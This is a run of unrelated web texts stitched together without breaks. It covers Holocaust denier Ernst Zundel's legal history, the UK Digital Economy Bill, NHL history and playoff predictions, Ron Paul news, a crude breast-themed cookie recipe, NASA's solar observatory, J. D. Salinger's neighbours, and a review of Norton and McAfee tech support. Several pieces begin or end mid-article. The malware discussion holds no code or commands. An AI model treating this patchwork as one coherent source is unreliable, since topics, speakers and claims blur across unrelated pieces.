Zundel even issued press releases protesting NBC ’s “ Holocaust ” miniseries for its portrayal of Germans .
And yet Toronto Sun columnist Mark Bonokoski reported that Zundel ’s maternal grandparents were Jewish .
Bonokoski also wrote that one of Zundel ’s ex-wives told him that Zundel was concerned enough about his lineage that he returned to Germany in the 1960s in search of his family ’s Nazi-era certificate of pure Aryan blood , but could find no such document .
Zundel lived in Canada for more than 40 years , although he was a German citizen .
He was tried twice there in the 1980s on criminal charges of using the mail to send hate propaganda .
His conviction at his first trial was overturned on a legal technicality .
His conviction at the second trial was also overturned when Canada ’s Supreme Court ruled that the charge on which he was convicted was unconstitutional .
In the late 1990s , Zundel was investigated anew by Canadian authorities , this time for promoting hatred against Jews on his website .
In 2000 , he moved to Sevierville , Tenn. , and married a fellow Holocaust denier named Ingrid Rimland ( who had run Zundel ’s website for years ) .
Three years later , he was arrested for violating U.S. immigration rules as he applied for citizenship and deported to Germany to face charges there .
Zundel tried to thwart the Germans by seeking refugee status in Canada .
Twice denied citizenship in Canada , his permanent residency status had expired after his move to Tennessee .
A judge denied his bid to remain in the country , saying he was a national security threat .
Zundel ’s trial in Germany lurched along , delayed when two of his attorneys were kicked off the case because of their own far - right , anti-Semitic views .
He was eventually convicted and sentenced to the maximum of five years in prison .
Canada Public Safety Minister Vic Toews on Tuesday made it clear that Zundel can forget about returning to that country should he long to leave the Black Forest .
“ In 2005 , a Federal Court judge confirmed that Zundel is inadmissible on security grounds for being a danger to the security of Canada , ” Toews said in a statement .
“ The decision reinforced the government of Canada ’s position that this country will not be a safe haven for individuals who pose a risk to Canada ’s national security . ”
Copyright holders will be responsible for monitoring networks
The controversial Digital Economy Bill has been passed into law during the wash - up period , which sees outstanding legislation rushed through before a general election .
The most controversial aspects of the bill - which could see persistent illegal file - sharers disconnected from the web and copyright holders given the power to block access to websites hosting illegal content - survived the process .
What is the Digital Economy Bill ?
It is a broad suite of legislation aimed at bringing Britain into the digital age .
It follows proposals about digital media set out in the Digital Britain White Paper published by the government in June 2009 .
There are various aspects of the bill , which cover everything from local television provision and video game ratings to the powers of regulator Ofcom and how internet domain names are registered in the UK .
It has now been given Royal assent , which means that it is now law .
The government says that some measures will be introduced immediately , whilst others will come in over the next two months .
In practice , the next Parliament will be able to study the most contentious aspects of the bill before they are enacted and there will be an extended period of public consultation on many aspects .
What happens now ?
The bill will touch on many areas of our digital lives .
However , the aspect that has received the most attention is measures designed to curb illegal file - sharing .
This is basically a long set of instructions to Ofcom to draw up guidelines for rights holders and ISPs on how they deal with net piracy .
This will take at least six months , whilst regulator Ofcom consults with interested parties and gets clearance from the EU .
This code of conduct will then be introduced for a year .
Measures could include sending letters to people identified as downloading illegal content and asking them to stop and pointing out legal alternatives .
At the end of the 12 months there will a review .
If illegal downloads do not fall ( by at least 70 % ) Ofcom will be asked to consider whether technical measures - which could include limiting the speed or capacity of an individual 's service or temporarily suspending their service - are needed .
These would likely be brought in in 2012 , if agreed upon .
Anyone targeted by the measures would be give the right to appeal , the government says .
What does this mean for me ?
In theory , if you do not upload or download copyrighted content , these plans should not affect you .
If you do , the government and creative industries hope that these measures will eventually encourage you to use legal services .
Is cutting people off from the net the only controversial aspect of the bill ?
No .
There are also concerns about how the file - sharing measures could affect public wi-fi services .
Specifically , people are concerned that the owner of a connection could be held liable even if they are not personally responsible for downloading pirated material .
So , for instance , if someone used wireless connectivity in a cafe to download free content , the cafe owner would be held responsible .
Universities and libraries are also concerned about this aspect .
Opponents are also concerned about laws to force internet service providers to block websites that host copyright free material .
The part of the bill that refers to this , Clause 18 , was dropped by the government during the wash - up period .
But a new amendment was inserted elsewhere , giving the government similar powers .
Originally the clause was intended to future - proof the legislation against other methods of copyright theft not yet thought about .
While it still allows copyright owners to force service providers to block access to certain sites , the process will now be subject to further debate and would need approval before being implemented .
Why are these measures being brought in ?
The government says it wants to protect the UK 's creative industries , which it says is under threat from piracy .
It is difficult to measure how much illegal file - sharing is going on .
It is reported that more than half of all the traffic on the net in the UK is content being shared illegally but service providers say they cannot measure it exactly .
The creative industries estimate that six million people in the UK regularly file - share copyright content without permission , costing the industries revenue that they cannot recoup .
A recent industry study , by economics firm TERA Consultants , estimated that the UK 's creative industries experienced losses of £ 1.2bn in 2008 due to piracy .
But campaign groups contest these figures and argue that the music industry has been slow to adapt to the internet age .
They say that the legislation has been brought into appease big business , whilst penalising individuals .
Why else do people oppose the bill ?
MPs from all parties have voiced concern that the laws have not received enough debate and have been rushed through parliament .
Campaigners say that the legislation will not work and will only drive illegal file - sharing underground .
They are also concerned that innocent people could be caught out by the legislation if their net connections are hijacked by pirates .
Companies such as Google have expressed concerns about the plans to block websites , which it says could result in legitimate content also being blocked .
Some ISPs have also long said they do not want to become the internet police , and have also pointed out that they are mere conduits of the traffic on the net .
How will illegal file - sharers be detected ?
The responsibility of tracking down pirates will lie with content rights owners , although ISPs will bear some of the costs .
They plan to monitor websites which offer links to copyright content and then obtain the Internet Protocol ( IP ) address of the online computer being used to share that data .
ISPs tend to own blocks of IP addresses , so it is relatively simple to identify the broadband account holder that is tied to a particular IP address at a particular time .
Will the proposals reduce illegal file - sharing ?
The music industry hopes so , but campaigners are sceptical .
The difficulty is that the problem is a moving target .
More persistent file - sharers are already beginning to use software which masks their IP address while online , and the files being exchanged are encrypted , so it is harder for ISPs to detect .
However , the music and film industries are more likely attempting to target the " soft , underbelly " of file - sharing : the teenagers who are doing it because they are either apathetic or believe they can get away with it .
They hope that the threat of being watched will be enough to prompt these people to use legitimate services .
But targeting these groups raises another difficult issue in the debate about temporarily suspending the accounts of file - sharers : they may be sharing their internet connection .
Teenagers are likely to be using a connection at their parents ' homes , and shared housing may see a number of independent users with just one file - sharer in their midst .
How have other countries dealt with the problem ?
Countries around the world are grappling with how to control internet piracy .
In the US , student Joel Tenebaum , who has admitted downloading 800 songs , was last year ordered to pay $ 675,000 ( £ 412,000 ) to various record labels after being found guilty on 31 charges of sharing music online .
In May 2009 , the French parliament passed legislation which would see a new state - agency sending warning letters to file sharers .
If they are caught three times , they will be cut off .
There have been protests against similar proposed legislation in Australia and New Zealand .
In response to the French legislation , European politicians ruled that cutting off someone 's internet connection could be a breach of their human rights .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
After all these years of Chicago and Vancouver being in the NHL they have only met in the playoffs 3 times .
That 's it .
For Canucks fans , it 's bittersweet stuff if you 're old enough to remember it .
For you younger peeps , it 's history lesson time :
1982
Their first meeting was in the Stanley Cup Semi-finals in 1982 , where the lunch - pail Canucks team , along with the superb goaltending of one Richard Brodeur were not to be denied .
Stan Smyl and co. beat the Blackhawks in 5 games in an infamous series , but it was quite memorable for a 5 - game series .
After beating the Blackhawks in overtime in game 1 ( a bit of a marathon that Jim Nill ended ) , the notorious game 2 occurred .
The ref called 4 consecutive penalties on the Canucks .
When Denis Savard scored on one of those power plays in the 3rd period making the score 4 - 1 Chicago .
Canucks coach Roger Nielson had enough .
He put a white towel on the end of a hockey stick and raised it into the air , indicating surrender to the " lousy " officiating .
A couple Canucks players , Tiger Williams and I believe Gerry Minor followed suit .
It was a beautiful site .
Towel power in hockey was born .
Roger Nielson however , was ejected from the game .
Check out the footage .
Great stuff .
See Brodeur tap Nielson on his way out and vice versa ?
See how players had to walk down those stairs in ol ' Chicago Stadium ?
Nuts !
Anyway , the Canucks did lose that game 4 - 1 , but rallied around the cause , beating the Hawks in the next 3 games and winning the series in 5 games .
The series got ugly before it ended though , especially in Game 5 .
Check these clips out :
Hawks were frustrated .
The Canucks were tuning them in Chicago in the final game before eliminating their candy asses .
1995
OK , excuse the elongated rant ...
This was the season after the Canucks went to the Finals .
Pat Quinn had stepped down as head coach and Rick Ley replaced him .
The Canucks made the following moves during the season :
- Brian Glynn went to Hartford on the waiver wire
- Shawn Antoski was traded to the Flyers for Joseph Beranek
- Murray Craven was traded to Chicago for Christian Ruutu ( oh christ )
- Greg Adams was traded to Dallas for some punk named Dan Kesa and picks ( nooo ! )
- Gerald Diduck was traded to the Hawks for a punk and another punk
- Canucks acquired Corey Hirsch from the Rangers for Nathan Lafayette
- Jiri Slegr was traded to the Oilers for Roman Oksiuta
So , how did that translate ?
Regular season " success " but PLAYOFF FAILURE !
Where did the defence go Mr. Ley ?
The Blackhawks swept the Canucks in round 1 2 of the playoffs with Chris Chelios scoring the winning goals in games 3 and 4 in OT .
Watch and weep and the atrocious defence ( if my html sucks , fast forward to 2:17 in the clip ) :
Are you kidding me ?
I do n't hear Canucks fans talk about this series all that much and it makes sense why .
The worst part about this is that those were the last 2 games played at the Pacific Coliseum before the Canucks moved to GM Place .
Oh well .
2009
The 4 - 2 series win by the Blackhawks in the 2009 NHL playoffs birthed a rivalry between the 2 teams that had long been forgotten .
It had been 14 years since Chelios buried the Canucks in the 1995 playoffs and it had been all but forgotten .
The 2009 playoff matchup had a special buildup to it to make the series itself even more intense .
Burrows ' hair - pulling incident remains strong in Hawks fans ' minds .
The 6 - game loss to Chicago in Round 2 last season did n't help .
Chicago fans believe they can make Luongo cry once again .
Hey , I 'm just providing a history lesson .
I 'll give more input on the up - coming series soon , as will the rest of us .
Info sources : Greatest Hockey Legends , History of NHL Trades ( toot toot ! )
If You Think the U.S. Chamber of Commerce Is in Favor of Free Markets , Then You Might Want To Think Again
Once again , Ron Paul gets the lowest GOP score from the U.S. Chamber of Commerce
By : Timothy P. Carney
The U.S. Chamber of Commerce has issued its 2009 congressional scorecard , and once again , Rep. Ron Paul , R - Tex . — certainly one of the two most free - market politicians in Washington — gets the lowest score of any Republican .
Paul was one of a handful of GOP lawmakers not to win the Chamber ’s “ Spirit of Enterprise Award . ”
He scored only a 67 % , bucking the Chamber on four votes , including :
* Paul opposed the “ Solar Technology Roadmap Act , ” which boosted subsidies for unprofitable solar energy technology .
* Paul opposed the “ Travel Promotion Act , ” which subsidizes the tourism industry with a new fee on international visitors .
* Paul opposed the largest spending bill in history , Obama ’s $ 787 billion stimulus bill .
Read more at the Washington Examiner .
Last year Tim Carney wrote :
Sen. Jim DeMint , R - S.C. , had the most conservative voting record in 2008 according to the American Conservative Union ( ACU ) , and was a “ taxpayer hero ” according to the National Taxpayer ’s Union ( NTU ) , but the U.S. Chamber of Commerce says his 2008 record was less pro-business than Barack Obama , Joe Biden , and Hillary Clinton .
Similarly , Texas libertarian GOPer Rep. Ron Paul — the most steadfast congressional opponent of regulation , taxation , and any sort of government intervention in business — scored lower than 90 % of Democrats last year on the Chamber ’s scorecard .
Evidently , pro-business does not mean pro-freedom in the US Chamber of Commerce ’s perspective , but only more mercantilism and corporatism .
The National Hockey League 's Board of Governors tonight unanimously approved a rule prohibiting " a lateral , back - pressure or blind - side hit to an opponent where the head is targeted and / or the principal point of contact . "
The timing and details of implementation are being worked on by the NHL's Hockey Operations Department in conjunction with representatives of the National Hockey League Players ' Association .
The NHL has updated its Privacy Policy effective January 16 , 2020 .
We encourage you to review it carefully .
The NHL uses cookies , web beacons , and other similar technologies .
By using NHL websites or other online services , you consent to the practices described in our Privacy Policy and Terms of Service , including our Cookie Policy .
Ron Paul Snaps Up Tickets for Southern Republican Leadership Conference
Created : March 05 , 2010 17:29 | Last updated : July 31 , 2020 00:00
In the wake of his somewhat surprising — and very soft - peddled — victory in the CPAC straw poll , Rep. Ron Paul ( R - Texas ) is gearing up for a big showing at the next GOP cattle call .
Paul ’s Campaign for Liberty is going to purchase hundreds of tickets for the event , held next month in New Orleans .
If a CPAC - sized contingent of Paul fans show up , would it be enough to win the event ’s straw poll ?
Well , in 2006 , Sen. Bill Frist ( R - Tenn . ) won the straw poll with a 36.9 percent plurality — of only 1,427 ballots .
An email with some info about the big buy , after the jump :
Subject : Help Support Dr. Paul in New Orleans ( your eyes only ! )
To :
Date : Friday , March 5 , 2010 , 2:58 PM
Hey Guys !
So I am inviting you to work with C4L and to come support Dr. Paul once again !
This time its April 8 - 11 and its in New Orleans , LA !
There is no need to volunteer for this , we are just asking for you to come out and help us in being apart of the http://www.srlc2010.com/ and help support Dr. Paul !
We will have discounted tickets ( so do n’t buy the tickets through the link above ! ) which you can purchase within the next week !
I am personally asking you to help me in this as I consider you to be a friend and leader in this movement and could use your help in recruiting others !
Here is the deal I have for you ( please keep this between us ! ) :
**
Deeply Discounted ticket to this **
Free Tshirt
Incentives :**
If you get 25 folks signed up your ticket is free !!
**( We will have promo codes on the SRLC C4L webpage - get those you recruit to put in your name so we can keep track of how many you get )
Upon supporting us , Dr. Paul will be holding a reception for supporters and attendees which will Dr. Paul and adult beverages !
**** Please let me know your availability and if you can help me in recruiting !
Thank you sincerely .
Do n’t forget the milk with them titties
Give it up for KISS MY PEANUT BUTTER TITTIES .
They are stupidly simple to make , show imagination and a touch of humor , the essentially ingredient in attraction .
If you ’re a guy , these say , “ I love your breasts so much I had to commemorate them with a high calorie treat . ”
If you ’re a woman , the cookies say , “ Just to remind you how amazing my breasts are , take a nibble , baby . ”
Everybody wins with these edible mammaries !
An added bonus is that you can make a ton of these if you are dating more than one person .
Plus they make great gifts for your friends , coworkers and family that are n’t easily offended .
You best get baking .
Ingredients ( makes 20 - 30 cookies ) :
1. 1 cup of brown sugar
2. 1 cup of white sugar
3. 1¼ cups of flour
4. ½ teaspoon of baking soda
5. ½ teaspoon of baking powder
6. ½ cup of peanut butter
7. 1 teaspoon of vanilla
8. ½ cup of honey
9. 2 eggs
10 . Hershey Kisses
11 . ½ cup of margarine or butter
Step 1
Preheat the oven to 375 degrees F . Mix the butter / margarine and peanut butter .
Mix in the eggs and vanilla .
Next mix the baking powder , baking soda , honey , white and brown sugars .
Finally mix the flour in ( the mixture will be thick so be careful not to burn out the engine if you use a hand blender ) .
Step 2
Unwrap all the Hershey Kisses and set aside .
Roll small balls of cookie dough the side of walnuts in their shells .
Set two balls side by side , leaving a ½ inch between them .
Make sure each pair has enough room to expand .
Bake 7 to 9 minutes until the edges of the cookies brown .
Remove from the oven and transfer onto wax paper to cool , immediately setting 2 Kisses on each cookie .
After a minute , pinch the tips and push down softly until you get your desire areola look .
Allow to cool , then package for gifts or each with milk , soymilk or by itself .
( CNN ) --
Your mother always said not to look directly at the sun .
In this case , you may want to make an exception .
NASA released stunning new images captured by their Solar Dynamics Observatory , or SDO , a space telescope designed to study our sun .
" SDO is our ' Hubble for the sun , ' " says Lika Guhathakurta , a NASA scientist , in a statement released Wednesday .
NASA says SDO will play a critical role in helping scientists understand our nearest star more thoroughly , as well as its effect on our planet .
Since its launch on February 11 , SDO has been moving into a geosynchronous orbit and bringing its on - board instruments online .
The images unveiled at Wednesday 's press conference are among the first images sent back by the Atmospheric Imaging Assembly , the observatory 's main telescope array .
One thing that makes SDO unique it its ability to see the big picture -- literally .
Rather than just focusing on a section of the sun , the observatory is able to monitor the entire sun in what it calls the " full disk " view .
NASA plans to have SDO in operation for the next five years , and says the observatory has enough fuel on board to continue to operate for an additional five years after it completes its initial science mission .
Eastern Conference
Washington ( 1 ) vs. Montreal ( 8 )
Montreal Wins If… Halak absolutely steals four games .
He ’s going to be shelled worse than London in WWII and if he does n’t play on his head then there is no way the Canadiens advance .
If Halak plays poorly the Montreal faithful will be calling for the fallen Carey Price , the man they ’ve booed mercilessly all year .
Washington Wins If … The Earth does n’t implode before game 4 .
Prediction : Washington in 5 – I ’ll be nice to Montreal fans and say Halak steals a game
New Jersey ( 2 ) vs. Philadelphia ( 7 )
New Jersey Wins If… Martin Brodeur forgets last year ’s implosion against the Hurricanes , 2008 ’s series against the Rangers , and this year ’s Olympics and remembers that he ’s Martin Brodeur , the greatest goalie of all - time …
If Kovalchuk can elevate his game and provide a dangerous 1 - 2 punch with Zach Parise …
If the Devils can receive scoring deeper than just the two aforementioned superstars .
Philadelphia Wins If… Brian Boucher forgets that he ’s Brian Boucher …
If Chris Pronger can neutralize Zach Parise and Ilya Kovalchuk …
If the Flyers deep core of forwards can outplay the Devils ’ forwards …
If both Carter and Gagne are healthy and productive …
If Daniel Carcillo rattles Martin Brodeur as badly as Sean Avery did in 2008 during the Rangers ’ 4 - 1 1st round victory .
Prediction : Philadelphia in 7 – banking on Boucher ... erg .
Buffalo ( 3 ) vs. Boston ( 6 )
Buffalo Wins If… Ryan Miller only marginally outplays Tuukka Rask .
The Bruins can’t score , so all Miller has to do is play a little better than Rask and the Sabres will advance .
They have balanced scoring and any of their lines should be able to exploit Matt Hunwick .
Boston Wins If… Tuukka Rask severely outplays Ryan Miller .
Boston can’t score , so Rask must be phenomenal and not only match Miller , but exceed him .
No easy task …
If Zdeno Chara remembers that he ’s 6 ’9 and 255 lbs and starts hitting people and blasting the puck with a vengeance …
If David Krejci continues his great play post -Olympics …
If the Bruins are n’t forced to rely on Mark Recchi and Miro Satan for scoring .
This series should be fun since it ’s this year ’s two best goalies , but Claude Julien and the Bruins have a way of sucking out all the fun from hockey , so this series will be awful .
Prediction : Buffalo in 6 – I should repeat that this will be 6 awful games that no one other than Bruins or Sabres fans will want to watch
Pittsburgh ( 4 ) vs. Ottawa ( 5 )
Pittsburgh Wins If… Sidney Crosby does n’t have to play forward , defence , and goalie at the same time …
If Evgeni Malkin is healthy and a viable threat …
If a defenceman other than Brooks Orpik throws a hit .
Ottawa Wins If… Daniel Alfredsson hits Matt Cooke from behind , steals the puck , and scores the OT winner without drawing a penalty or suspension …
If Daniel Alfredsson can focus on playing hockey and not shooting the puck at any well - respected veterans after the buzzer …
If Anton Volchenkov and Chris Phillips block more shots than Dikembe Mutombo during a junior high pick - up game .
Prediction : Pittsburgh in 5
Western Conference
San Jose ( 1 ) vs. Colorado ( 8 )
San Jose Wins If… Evgeni Nabokov does n’t play like he did in the Olympics …
If the Sharks realize the Avalanche are young , inexperienced , and have played worse than any other playoff team over the past 10 games …
If Joe Thornton and Patrick Marleau play to win , rather than not to lose .
Colorado Wins If… Matt Duchene and Peter Mueller are healthy and play like they are 10 year veterans , rather than players with just over 300 regular season games under their belts …
If Craig Anderson continues his improbable year and does n’t realize that he ’s little more than a 28 - year - old journeyman …
If the Sharks choke like they are prone to do .
Prediction : San Jose in 5 – this is the best matchup the Sharks could have hoped for since the Avs limped into the playoffs .
The Sharks should beat them handily , but you never know with the Sharks .
Chicago ( 2 ) vs. Nashville ( 7 )
Chicago Wins If …
They do n’t ask a local tavern owner to leave the arena with his goat on account of its odour .
Nashville Wins If… Patric
Hornqvist can play , considering he ’s the Preds ’ leading goal - scorer and only player with more than 25 goals …
If Shea Weber ’s slap shot breaks the legs of the entire Chicago team …
If a deep Nashville blueline can contain a deep Chicago forward corp …
If the Blackhawks are dumb enough to play Cristobal Huet .
Prediction : Chicago in 4
Vancouver ( 3 ) vs. Los Angeles ( 6 )
Vancouver Wins If… Roberto Luongo ’s post -Olympics hangover is only a result of being bored by a lack of pressure filled games …
If the rest of the Vancouver defence can play a solid game without Willie Mitchell …
If the Sedins continue to make me look stupid for hating on them …
If Stéphane Auger does n’t ref every game .
Los Angeles Wins If… Jonathan Quick stops playing like garbage ( I contemplated making a stupid joke calling him Jonathan Slow … you should thank me ) …
If Ryan Smyth stands on top of Luongo ’s head and does n’t let him see anything …
If Dustin Brown can play a more effective two - way game than Ryan Kesler … If Drew Doughty plays like the future Norris winner he is …
If Frolov wakes up and realizes he ’s in a contract year …
If the Kings play with poise beyond their age .
Prediction : Canucks in 6 – this will be an exciting , hard - fought series , but I think the Kings ’ youth will be their undoing .
Phoenix ( 4 ) vs. Detroit ( 5 )
Phoenix Wins If … The Wings revert to their play at the beginning of the year , instead of the post -Olympic juggernaut that went 16 - 3 - 2 down the stretch …
If Ilya Bryzgalov steals 4 games .
The Coyotes have the 7th worst goals per game and their only player with more than 25 goals is Lee Stempniak , which does not bode well …
If more than 5,000 people show up to support the Coyotes .
Detroit Wins If …
They continue their post -Olympic play …
If Jimmy Howard looks in front of him and sees Nicklas Lidstrom …
If Ilya Bryzgalov looks in front of him and sees Ed Jovanovski …
If Detroit absolutely kills Phoenix in game one and sets the tone for the entire series .
Prediction : Detroit in 5 – Phoenix is getting no respect , which is the only thing that worries me .
They might use the whole ‘ us against the world ’ angle and rally off a few wins .
Everybody is making picks and instead of racking my brain for an interesting and unique post to slap up on the site I ’m doing the same .
The only difference is that I recognize that everyone has a shot at winning , no matter how small ( MONTREAL ) .
That being said , I ’ve outlined what needs to happen for each team to win and underneath I ’ve declared my bold predictions .
They say the only thing stupider than predictions is the person who makes them !
I do n’t know if they actually say that , but I made it up right now .
Feel free to use that if everything I predict fails to come true .
And last week , after his death , his neighbors would not talk about him , reflecting what one called “ the code of the hills . ”
Image J. D. Salinger moved to Cornish in search of privacy .
Credit ...
The New York Times
“ Nobody conspired to keep his privacy , but everyone kept his privacy — otherwise he would n’t have stayed here all these years , ” said Sherry Boudro of nearby Windsor , Vt. , who said her father , Paul Sayah , befriended Mr. Salinger in the 1970s .
“ This community saw him as a person , not just the author of ‘ The Catcher in the Rye . ’
They respect him .
He was an individual who just wanted to live his life . ”
The curious constantly descended on Cornish and the surrounding area , asking residents for directions to Mr. Salinger ’s house .
Instead of finding the home , interlopers would end up on a wild goose chase .
How far afield the directions went “ depended on how arrogant they were , ” said Mike Ackerman , owner of the Cornish General Store .
Mr. Salinger , he said , “ was like the Batman icon .
Everyone knew Batman existed , and everyone knows there ’s a Batcave , but no one will tell you where it is . ”
Cornish , a town of about 1,700 on the banks of the Connecticut River , has two general stores , a post office , a church and miles of pines , oaks , farmland and rolling hills .
The town has long been a summer haven for artists and writers , a solitary escape in the woods .
Symantec and McAfee are two top contenders when it comes to antivirus software .
But one of them needs to re-educate its support technicians ... again .
Last year I reported on a significant problem with Symantec 's tech support for their Norton products .
A number of their support technicians strongly steered all customers toward Symantec 's extra-cost virus removal service rather than offering to help them in any other available ways .
Symantec responded that one particular support office had gone " " and that their actions were counter to company policy .
This week , in the course of evaluating Norton AntiVirus 2010 , I ran into exactly the same problem .
The product installed without difficulty on eleven of my twelve malware - infested test systems .
It even performed some clever self - diagnostics to get past problems that have stymied other security products , like a malware threat that installed itself as a proxy controlling all Internet access .
But on one test system , Norton AntiVirus stubbornly refused to installeven in Safe Mode .
After working through the help system 's various options , I hooked up with chat - based support and got the runaround from two different techs .
Following up , I obtained official policy statements from Symantec and also from McAfee regarding just what you can expect from their tech support .
Tech Support  Round One
The very first thing the support technician did , without exploring any alternatives or asking me for details , was push me toward the extra-cost virus removal service .
This excerpt from the chat transcript speaks for itself :
Agent : From looking at your issue , it appears that your computer may be infected by a virus .
To help you with removing this virus off your computer what I can do for you is to transfer you across to our fee - based virus removal specialist team .
Would this be ok with you ?
Me : Fee -based ?
Do n't be silly .
All I want to do is install NAV2010 .
Surely you have some tools or something to get it past the install problem ?
Agent : All antivirus softwares are reactive and sensitive software .
They will not get installed in a computer which is already infected with any virus , worm or spy ware .
In these situations even if the product gets installed it will not get installed properly in your computer and starts to give you error messages .
So , after removing the infections only you can install the software successfully
Me : OK , so your statement is that NAV2010 is incapable of cleaning up the problems on my system , and that my only hope is to pay much more than the product would cost in order to get it installed .
Correct ?
Agent :
It is not like that .
Once you have a virus on your computer , it may attack Norton and prevent it from working properly ; in these cases , the virus must be removed manually .
Norton offers free , do - it - yourself support options as well as a paid service where we take care of removing threats for you .
Me : OK , what are my do - it - yourself options ?
Agent :
They will let you know all the details .
May I transfer you ?
Me : Transfer me to paid support ?
*NO *!
Agent :
The charges and other information will be informed to you in advance .
They will let you know the free do it yourself steps also .
At this point I agreed to talk with the specialist .
Notice that I asked the tech specifically about any tools that might help with the problem , giving him a clear opportunity to recommend the Norton Bootable Recovery Tool .
He never did , and he repeatedly stated that if Norton wo n't install due to malware , the threat must be removed manually .
Tech Support  Round Two
Knowing that I could at least talk to the virus removal specialist without incurring a $ 99 charge , I went ahead .
Unfortunately the second - tier expert was n't any more helpful .
Here are the relevant portions of that conversation :
Agent :
As I understand from your issue description , your computer is infected with a malware which is blocking the installation of the Norton product and you need help in removing the infection .
Is that correct ?
Me : Really , I just need help getting NAV installed .
I 'm sure it will take care of the malware if it can get past the initial obstacle .
Maybe you have some kind of pre-install tool to help with this problem ?
I know some other companies do .
Agent : Neil , may I know the name of the infection ?
Me :
The error messages that come up do not mention any name
Agent : Neil , the technician from the technical support team has transferred you to the virus removal department because the technician detected the presence of infection on your computer that is preventing you from installing the Antivirus program , so in such a case we need to remove the infections manually before we can install any antivirus programs .
Me : Yes , he said that .
Agent : Neil , there are multiple options for virus / malware removal available .
The primary options are : 1 . Do -It - Yourself ( DIY ) procedures available on the Norton Support website .
2 . Fee - based Premium Services whereby Norton technicians remove infections .
The DIY options on the Norton Support website provide step - by - step removal for most infections .
Highly technical users often find these instructions sufficient .
For users who do not find the standard Norton Support options sufficient , Norton has expert technicians on staff who can remove infections for you at a fee .
Me : Absolute NO to fee - based services .
I did not find the DIY services on the web site .
Where do I find that ?
Agent : Norton provides free online support that has ' step by step instructions ' to remove the threats from your computer .
The free online support is available to you at http://www.norton.com/virushelp.
Type in the relevant threat name in the search box to view the relevant instructions
Me : And how do I determine the name ?
[ [ The tech simply ignored this question . ] ]
Agent : Neil , if you wish to proceed with our premium paid support , our expert technicians will do a detail diagnosis of your computer and remove any infection present on it .
Me : IN SHORT : NAV2010 is not capable of installing and cleaning up this computer unless I pay a very large amount of money .
Please confirm this is correct
Me : Again , my conclusion is that NAV2010 itself is incapable of cleaning up this system because it will not install .
Please confirm that this is correct
Me : NAV2010 alone will not clean up my computer .
Yes or no ?...
Agent :
If a virus is already present on your computer prior to installation , Norton products may not be able address the issue .
Here again I asked about some kind of tool that might clear the system enough to install Norton , but the tech blew off that question .
After my repeated queries he eventually stated that Norton wo n't necessarily clean up a system that already has malware . 
The Official Word from Symantec
I checked with my Symantec contacts and they were shocked !
shocked !
to find that online tech support is still funneling users toward the expensive malware removal service rather than actually helping them .
I asked them exactly what users should expect when malware interferes with their attempts to install a Norton product .
Here 's what they had to say .
" Norton products ( NAV , NIS and N360 ) are generally used to help keep a system malware free .
However , we know that many users install Norton after they 've already been infected .
We know from independent 3rd party tests that we generally do very well at cleaning systems that are already infected
If the Norton software installs normally , we will scan to remove any malware that we detect .
If the Norton software can NOT install , we will automatically initiate a pre-install scan to remove any malware that we detect .
This step is specifically designed to clean up malware that is already present on a user 's system prior to Norton being installed .
If the system is so infected that the step above is not successful or the system wo n't even boot , we recommend booting from the install CD which contains the Norton Bootable Recovery Disk .
Once booted , Norton can scan the infected system without being compromised by any of the OS which may be infected .
We then repair both the disk and the registry .
The Retail CD is bootable and users who do n't have media can create this CD on another system .
Coming soon , we will deliver a new stand - alone scanner that is both available from within the product and available as a download .
This scanner will provide very aggressive detection and remediation for systems that are already highly infected .
In a nutshell , we want to deliver the right tool for the right problem to maximize effectiveness and minimize false positives .
We 've designed Norton NAV , NIS , and N360 to operate much like the local police force : Keeping users safe day in and day out .
However , sometimes we need Special Weapons and Tactics to operate more aggressively to match these more aggressive threats .
This new , more aggressive scanner and the Norton Bootable Recovery Disk are our " SWAT team . "
However , these tactics are not always appropriate in everyday situations .
We believe that a SWAT team is the right choice when there 's a bank robbery with hostages , but you do n't need or even want the SWAT team responding to traffic accidents or loud parties . "
In short , if your Norton product has trouble installing , it should automatically invoke its own troubleshooting tools including a pre-install scanner .
If that does n't work the next step is Norton 's bootable recovery disk which cleans up the malware without every launching your regular Windows operating system .
Symantec is confident these steps will get your Norton product installed , at which point it can take over for a full cleanup .
( And in fact the bootable recovery disk did solve the problem with my infested test system ) .
The Official Word from McAfee
I also ran into installation problems in my recent review of .
The product either would n't install or would n't run on six of the twelve infested test systems .
McAfee 's online support technicians offered a whole host of tools to correct these problems  Virtual Technician , Stinger , FreeScan , and more .
Even after running through these options I still had one system where McAfee would n't install and one where it would n't run after installation .
Like Symantec , McAfee offers an extra -cost virus removal service , but in a case like mine where the product wo n't even install or run due to malware the support technicians can escalate to the virus removal service without invoking the fee .
It took some time hours actually but the experts cleaned up both systems , allowing the product to install and run correctly .
I asked my McAfee contacts to verify that giving users free access to the advanced virus removal service is standard policy , not something they did just for me .
Here 's their official policy statement :
" McAfee strives to ensure that all consumers who purchase our products are extremely satisfied with their purchases .
We offer consumers a 60 day money back guarantee for all purchases from McAfee .
Additionally , consumers in direct and retail channels are entitled to free 30 day phone support and unlimited chat support for the duration of their subscription .
Should a customer experience problems related to malware infections upon installation , there are several options from McAfee Technical Support .
First , McAfee advises them about McAfee 's free virus removal tools , such as Stinger , as well as malware removal instructions posted in McAfee 's Virus Information Library .
McAfee also provides links to approved freeware malware removal tools within the McAfee Community Forum as well as postings pertaining to virus infections .
If after all free options are explored , and " live " assistance is still needed to remove malware , customers are told about McAfee 's Virus Removal Service .
This service leverages remote assistance technology , allowing the customer to watch the removal process as they speak with the McAfee agent by phone .
As long as the consumer has purchased their product directly from McAfee or from the retail channel , McAfee will waive all fees for the " live " assistance involving the removal of malware from a consumer 's system and installation of McAfee security suites . "
In other words , if you 've paid for your McAfee product they will exert all efforts up to and including the normally fee - based malware cleanup service to make sure you can use the product you bought .
That 's a powerful statement , and it's more than Symantec offers .
Get the Support You Deserve
If you 've purchased a security suite or anti-malware tool to clean up problems on your computer , you can reasonably expect the product to do that job .
If self - defending malware interferes with installation or prevents the product from running its anti-malware scan you can reasonably expect the vendor to help you with the problem .
And if they just can't get the product installed , you can reasonably expect your money back .
What is n't remotely reasonable is the idea that you should pay big bucks for the privilege of installing the program you 've already bought .
Symantec 's official position is that tech support should help with the problem and at least direct you to the bootable scanner which they hope will solve the installation problem .
McAfee will invoke their normally - costly remediation service to make sure you can install the product .
Sunbelt Software is even more proactive .
The price of their anti-malware tool specifically includes any necessary remediation .
Sunbelt 's CEO Alex Eckelberry says " We provide 100 % free support to any customer , regardless of the issue .
This includes install problems , a malware infestation , whatever .
